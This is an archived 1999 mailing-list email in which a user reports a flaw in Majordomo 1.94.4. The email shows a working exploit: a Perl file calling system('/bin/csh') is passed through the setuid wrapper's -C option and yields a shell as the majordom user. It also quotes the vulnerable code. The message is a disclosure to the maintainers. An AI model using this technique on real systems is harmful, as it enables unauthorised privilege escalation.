>From majordomo-workers-owner Fri Dec 3 13:13:01 1999 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-980720-1) id MAA00667; Fri, 3 Dec 1999 12:57:46 -0800 (PST) Received: (mcb@localhost) by honor.greatcircle.com (8.8.5/Honor-980202-1) id MAA00657 for majordomo-workers@greatcircle.com; Fri, 3 Dec 1999 12:57:44 -0800 (PST) Received: from tirin.openworld.co.uk (tirin.openworld.co.uk [194.207.107.233]) by honor.greatcircle.com (8.8.5/Honor-980202-1) with ESMTP id NAA13922 for ; Thu, 2 Dec 1999 13:55:01 -0800 (PST) Received: from localhost (shevek@localhost) by tirin.openworld.co.uk (8.9.3/8.9.3) with ESMTP id WAA03319 for ; Thu, 2 Dec 1999 22:00:48 GMT Date: Thu, 2 Dec 1999 22:00:48 +0000 (GMT) From: Shevek X-Sender: shevek@tirin.openworld.co.uk To: majordomo-workers@greatcircle.com Subject: $cf Security flaw Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: majordomo-workers-owner@GreatCircle.COM Precedence: bulk Status: RO Content-Length: 1640 Lines: 61 I can get majordomo privelidges as a user. shevek@tirin ~$ cat foo.pl system("/bin/csh"); shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl % %whoami majordom root@tirin /usr/local/majordomo# ls -ld . drwxr-x--x 6 majordom daemon 1024 Dec 2 21:49 ./ root@tirin /usr/local/majordomo# ls -l wrapper -rwsr-xr-x 1 root daemon 6630 Jul 12 11:21 wrapper* The lines in Majordomo (I found the bug by simple inspection, it's also in resend) $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf"; while ($ARGV[0]) { # parse for config file or default list if ($ARGV[0] =~ /^-C$/i) { # sendmail v8 clobbers case $cf = $ARGV[1]; shift(@ARGV); shift(@ARGV); } elsif ($ARGV[0] eq "-l") { $deflist = $ARGV[1]; shift(@ARGV); shift(@ARGV); } else { die "Unknown argument $ARGV[0]\n"; } } if (! -r $cf) { die("$cf not readable; stopped"); } require "$cf"; Am I doing something wrong, or is this a general flaw? Can I simply disable all the possible methods of setting $cf without breaking other things? I haven't had time to inspect the system at any length, I just glanced at it. I am not on any greatcircle mailing lists, I would appreciate replies to my own address if there is discussion on this subject. Majordomo version 1.94.4 Perl 5.005_03 Ta. S. -- Shevek GM/CS/MU -d+ H+>++ s+: !g p2 au0 !a w+++ v-(---) C++++$ UL++++$ UB+ US+++$ UI+++$ P+>++++ L++++$ 3+ E--- N K !W(-----) M(-) !V -po+ Y+ t+ 5++ !j !R G' !tv b+++ D++ B--- e+ u+* h++ f? r-- n---- y? Recent UH+>++ UO+ UC++ U?+++ UV++ and collecting.